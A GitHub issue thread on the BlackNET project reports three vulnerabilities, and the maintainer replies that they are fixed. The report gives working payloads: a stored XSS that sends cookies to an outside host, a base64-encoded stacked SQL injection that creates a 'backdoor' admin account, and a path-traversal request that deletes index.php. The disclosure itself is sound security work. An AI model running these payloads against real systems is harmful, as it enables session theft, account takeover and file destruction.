### ISSUE TITLE
Vulnerability

### ISSUE THREAD

**Issue by marcf2009** [BlackHacker511/BlackNET#44]
Persistent XSS:

fetch("connection.php?data="+btoa("vcid<img src=x onerror=fetch('https://bla.com/x.php?c='+encodeURI(document.cookie)) />|BN|cpname|BN|os|BN|av|BN|stats|BN|usb|BN|admin"))

Stacked SQLI:

/receive.php?vicID=Jyk7SU5TRVJUIElOVE8gYGFkbWluYCAoYHVzZXJuYW1lYCwgYHBhc3N3b3JkYCwgYGVtYWlsYCwgYHJvbGVgLCBgczJmYWAsIGBzZWNyZXRgLCBgc3FlbmFibGVgLCBgcXVlc3Rpb25gLCBgYW5zd2VyYCkgVkFMVUVTCignYmFja2Rvb3InLCAnNjNjZDE2NzI2ZjFiNTZlZjEyMGQ1YzFkZGZmYWVkM2UzZDQ3MmFmNmRhYmM1OTE0YTkzYjU1Y2YzMGNhMjg0ZCcsICdsb2NhbGhvc3RAZ21haWwuY29tJywgJ2FkbWluaXN0cmF0b3InLCAnb2ZmJywgJ251bGwnLCAnb2ZmJywgJ1NlbGVjdCBhIFNlY3VyaXR5IFF1ZXN0aW9uJywgJycpOy8qCg==&command=Q2xlYW5Db21tYW5kcw==

 

Path Manipulation für unlink/delete:

fetch('/receive.php?vicID=&command='+btoa('DeleteScript|BN|../index.php'))

**Comment by BlackHacker511** [comment]
Fixed them all I might update the GitHub code tomorrow just running some test on the new changes.

thanks for the report
